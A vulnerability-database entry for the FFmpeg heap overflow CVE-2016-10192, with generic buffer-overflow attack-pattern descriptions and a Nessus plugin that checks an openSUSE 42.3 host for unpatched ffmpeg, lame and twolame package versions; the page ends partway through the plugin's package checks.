Vulnerabilities > CVE-2016-10192 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Ffmpeg
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Heap-based buffer overflow in ffserver.c in FFmpeg before 2.8.10, 3.0.x before 3.0.5, 3.1.x before 3.1.6, and 3.2.x before 3.2.2 allows remote attackers to execute arbitrary code by leveraging failure to check chunk size.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Overflow Buffers Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
- Client-side Injection-induced Buffer Overflow This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
- Filter Failure through Buffer Overflow In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
- MIME Conversion An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.
Nessus
NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-1067.NASL description This update introduces lame and twolame. For ffmpeg2 it updates to version 2.8.13 and fixes several issues. These security issues were fixed : - CVE-2017-14058: The read_data function in libavformat/hls.c did not restrict reload attempts for an insufficient list, which allowed remote attackers to cause a denial of service (infinite loop) (bsc#1056762). - CVE-2017-14057: In asf_read_marker() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted ASF file, which claims a large last seen 2020-06-05 modified 2017-09-18 plugin id 103289 published 2017-09-18 reporter This script is Copyright (C) 2017-2020 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/103289 title openSUSE Security Update : ffmpeg / ffmpeg2 (openSUSE-2017-1067) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2017-1067. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(103289); script_version("3.3"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-10190", "CVE-2016-10191", "CVE-2016-10192", "CVE-2016-9561", "CVE-2017-11399", "CVE-2017-14054", "CVE-2017-14055", "CVE-2017-14056", "CVE-2017-14057", "CVE-2017-14058", "CVE-2017-14059", "CVE-2017-14169", "CVE-2017-14170", "CVE-2017-14171", "CVE-2017-14222", "CVE-2017-14223", "CVE-2017-14225", "CVE-2017-7863", "CVE-2017-7865", "CVE-2017-7866"); script_name(english:"openSUSE Security Update : ffmpeg / ffmpeg2 (openSUSE-2017-1067)"); script_summary(english:"Check for the openSUSE-2017-1067 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update introduces lame and twolame. For ffmpeg2 it updates to version 2.8.13 and fixes several issues. These security issues were fixed : - CVE-2017-14058: The read_data function in libavformat/hls.c did not restrict reload attempts for an insufficient list, which allowed remote attackers to cause a denial of service (infinite loop) (bsc#1056762). - CVE-2017-14057: In asf_read_marker() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted ASF file, which claims a large 'name_len' or 'count' field in the header but did not contain sufficient backing data, was provided, the loops over the name and markers would consume huge CPU and memory resources, since there is no EOF check inside these loops (bsc#1056761). - CVE-2017-14059: A DoS in cine_read_header() due to lack of an EOF check might have caused huge CPU and memory consumption. When a crafted CINE file, which claims a large 'duration' field in the header but did not contain sufficient backing data, was provided, the image-offset parsing loop would consume huge CPU and memory resources, since there is no EOF check inside the loop (bsc#1056763). - CVE-2017-14056: A DoS in rl2_read_header() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted RL2 file, which claims a large 'frame_count' field in the header but did not contain sufficient backing data, was provided, the loops (for offset and size tables) would consume huge CPU and memory resources, since there is no EOF check inside these loops (bsc#1056760). - CVE-2017-14055: a DoS in mv_read_header() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted MV file, which claims a large 'nb_frames' field in the header but did not contain sufficient backing data, was provided, the loop over the frames would consume huge CPU and memory resources, since there is no EOF check inside the loop (bsc#1056766). - boo#1046211: Lots of integer overflow fixes - CVE-2016-9561: The che_configure function in libavcodec/aacdec_template.c in FFmpeg allowed remote attackers to cause a denial of service (allocation of huge memory, and being killed by the OS) via a crafted MOV file (boo#1015120) - CVE-2017-7863: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame_common function in libavcodec/pngdec.c (boo#1034179) - CVE-2017-7865: FFmpeg had an out-of-bounds write caused by a heap-based buffer overflow related to the ipvideo_decode_block_opcode_0xA function in libavcodec/interplayvideo.c and the avcodec_align_dimensions2 function in libavcodec/utils.c (boo#1034177) - CVE-2017-7866: FFmpeg had an out-of-bounds write caused by a stack-based buffer overflow related to the decode_zbuf function in libavcodec/pngdec.c (boo#1034176) - CVE-2016-10190: Heap-based buffer overflow in libavformat/http.c in FFmpeg allowed remote web servers to execute arbitrary code via a negative chunk size in an HTTP response (boo#1022920) - CVE-2016-10191: Heap-based buffer overflow in libavformat/rtmppkt.c in FFmpeg allowed remote attackers to execute arbitrary code by leveraging failure to check for RTMP packet size mismatches (boo#1022921) - CVE-2016-10192: Heap-based buffer overflow in ffserver.c in FFmpeg allowed remote attackers to execute arbitrary code by leveraging failure to check chunk size (boo#1022922) - CVE-2017-14169: In the mxf_read_primer_pack function an integer signedness error have might occured when a crafted file, which claims a large 'item_num' field such as 0xffffffff, was provided. As a result, the variable 'item_num' turns negative, bypassing the check for a large value (bsc#1057536). - CVE-2017-14170: Prevent DoS in mxf_read_index_entry_array() due to lack of an EOF (End of File) check that might have caused huge CPU consumption. When a crafted MXF file, which claims a large 'nb_index_entries' field in the header but did not contain sufficient backing data, was provided, the loop would consume huge CPU resources, since there was no EOF check inside the loop. Moreover, this big loop can be invoked multiple times if there is more than one applicable data segment in the crafted MXF file (bsc#1057537). - CVE-2017-14171: Prevent DoS in nsv_parse_NSVf_header() due to lack of an EOF (End of File) check taht might have caused huge CPU consumption. When a crafted NSV file, which claims a large 'table_entries_used' field in the header but did not contain sufficient backing data, was provided, the loop over 'table_entries_used' would consume huge CPU resources, since there was no EOF check inside the loop (bsc#1057539). - CVE-2017-14223: Prevent DoS in asf_build_simple_index() due to lack of an EOF (End of File) check that might have caused huge CPU consumption. When a crafted ASF file, which claims a large 'ict' field in the header but did not contain sufficient backing data, was provided, the for loop would consume huge CPU and memory resources, since there was no EOF check inside the loop (bsc#1058019) - CVE-2017-14222: Prevent DoS in read_tfra() due to lack of an EOF (End of File) check that might have caused huge CPU and memory consumption. When a crafted MOV file, which claims a large 'item_count' field in the header but did not contain sufficient backing data, was provided, the loop would consume huge CPU and memory resources, since there was no EOF check inside the loop (bsc#1058020) These non-security issues were fixed : - Unconditionalize celt, ass, openjpeg, webp, libva, vdpau. - Build unconditionally with lame and twolame - Enable AC3 and MP3 decoding to match multimedia:libs/ffmpeg (3.x) For ffmpeg it updates to version 3.3.4 and fixes several issues. These security issues were fixed : - CVE-2017-14225: The av_color_primaries_name function may have returned a NULL pointer depending on a value contained in a file, but callers did not anticipate this, leading to a NULL pointer dereference (bsc#1058018). - CVE-2017-14223: Prevent DoS in asf_build_simple_index() due to lack of an EOF (End of File) check that might have caused huge CPU consumption. When a crafted ASF file, which claims a large 'ict' field in the header but did not contain sufficient backing data, was provided, the for loop would consume huge CPU and memory resources, since there was no EOF check inside the loop (bsc#1058019). - CVE-2017-14222: Prevent DoS in read_tfra() due to lack of an EOF (End of File) check that might have caused huge CPU and memory consumption. When a crafted MOV file, which claims a large 'item_count' field in the header but did not contain sufficient backing data, was provided, the loop would consume huge CPU and memory resources, since there was no EOF check inside the loop (bsc#1058020). - CVE-2017-14058: The read_data function in libavformat/hls.c did not restrict reload attempts for an insufficient list, which allowed remote attackers to cause a denial of service (infinite loop) (bsc#1056762) - CVE-2017-14057: In asf_read_marker() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted ASF file, which claims a large 'name_len' or 'count' field in the header but did not contain sufficient backing data, was provided, the loops over the name and markers would consume huge CPU and memory resources, since there is no EOF check inside these loops (bsc#1056761) - CVE-2017-14059: A DoS in cine_read_header() due to lack of an EOF check might have caused huge CPU and memory consumption. When a crafted CINE file, which claims a large 'duration' field in the header but did not contain sufficient backing data, was provided, the image-offset parsing loop would consume huge CPU and memory resources, since there is no EOF check inside the loop (bsc#1056763) - CVE-2017-14054: A DoS in ivr_read_header() due to lack of an EOF (End of File) check might have caused huge CPU consumption. When a crafted IVR file, which claims a large 'len' field in the header but did not contain sufficient backing data, was provided, the first type==4 loop would consume huge CPU resources, since there is no EOF check inside the loop (bsc#1056765). - CVE-2017-14056: A DoS in rl2_read_header() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted RL2 file, which claims a large 'frame_count' field in the header but did not contain sufficient backing data, was provided, the loops (for offset and size tables) would consume huge CPU and memory resources, since there is no EOF check inside these loops (bsc#1056760) - CVE-2017-14055: a DoS in mv_read_header() due to lack of an EOF (End of File) check might have caused huge CPU and memory consumption. When a crafted MV file, which claims a large 'nb_frames' field in the header but did not contain sufficient backing data, was provided, the loop over the frames would consume huge CPU and memory resources, since there is no EOF check inside the loop (bsc#1056766) - CVE-2017-11399: Integer overflow in the ape_decode_frame function allowed remote attackers to cause a denial of service (out-of-array access and application crash) or possibly have unspecified other impact via a crafted APE file (bsc#1049095). - CVE-2017-14171: Prevent DoS in nsv_parse_NSVf_header() due to lack of an EOF (End of File) check taht might have caused huge CPU consumption. When a crafted NSV file, which claims a large 'table_entries_used' field in the header but did not contain sufficient backing data, was provided, the loop over 'table_entries_used' would consume huge CPU resources, since there was no EOF check inside the loop (bsc#1057539) - CVE-2017-14170: Prevent DoS in mxf_read_index_entry_array() due to lack of an EOF (End of File) check that might have caused huge CPU consumption. When a crafted MXF file, which claims a large 'nb_index_entries' field in the header but did not contain sufficient backing data, was provided, the loop would consume huge CPU resources, since there was no EOF check inside the loop. Moreover, this big loop can be invoked multiple times if there is more than one applicable data segment in the crafted MXF file (bsc#1057537) - CVE-2017-14169: In the mxf_read_primer_pack function an integer signedness error have might occured when a crafted file, which claims a large 'item_num' field such as 0xffffffff, was provided. As a result, the variable 'item_num' turns negative, bypassing the check for a large value (bsc#1057536) It also includes various fixes for integer overflows and too-large bit shifts that didn't receive a CVE. These non-security issues were fixed : - Unconditionalize celt, ass, openjpeg, webp, netcdf, libva, vdpau. - Build unconditionally with lame and twolame - Enabled cuda and cuvid for unrestricted build. - Add additional checks to ensure MPEG is off" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1015120" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022920" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022921" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1022922" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034176" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034177" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1034179" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1046211" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1049095" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1056760" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1056761" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1056762" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1056763" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1056765" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1056766" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1057536" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1057537" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1057539" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1058018" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1058019" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1058020" ); script_set_attribute( attribute:"solution", value:"Update the affected ffmpeg / ffmpeg2 packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg2-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:ffmpeg2-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:lame"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:lame-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:lame-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:lame-mp3rtp"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:lame-mp3rtp-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec56-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavcodec57-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice56-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavdevice57-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter5-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavfilter6-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat56-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavformat57-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample2-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavresample3-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil54-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libavutil55-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmp3lame-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmp3lame0"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmp3lame0-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmp3lame0-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libmp3lame0-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc53-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libpostproc54-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample1-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswresample2-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale3-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libswscale4-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libtwolame-devel"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libtwolame0"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libtwolame0-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libtwolame0-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:libtwolame0-debuginfo-32bit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:twolame"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:twolame-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:twolame-debugsource"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.3"); script_set_attribute(attribute:"patch_publication_date", value:"2017/09/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/09/18"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.3", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.3", reference:"ffmpeg-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"ffmpeg-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"ffmpeg-debugsource-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"ffmpeg2-debugsource-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"ffmpeg2-devel-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"lame-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"lame-debuginfo-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"lame-debugsource-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"lame-mp3rtp-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"lame-mp3rtp-debuginfo-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavcodec-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavcodec56-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavcodec56-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavcodec57-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavcodec57-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavdevice-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavdevice56-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavdevice56-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavdevice57-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavdevice57-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavfilter-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavfilter5-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavfilter5-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavfilter6-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavfilter6-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavformat-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavformat56-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavformat56-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavformat57-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavformat57-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavresample-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavresample2-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavresample2-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavresample3-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavresample3-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavutil-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavutil54-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavutil54-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavutil55-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libavutil55-debuginfo-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libmp3lame-devel-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libmp3lame0-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libmp3lame0-debuginfo-3.99.5-2.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libpostproc-devel-3.3.4-7.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libpostproc53-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libpostproc53-debuginfo-2.8.13-32.1") ) flag++; if ( rpm_check(release:"SUSE42.3", reference:"libpostproc54-3.3.4-7.1") ) flag++; if ( 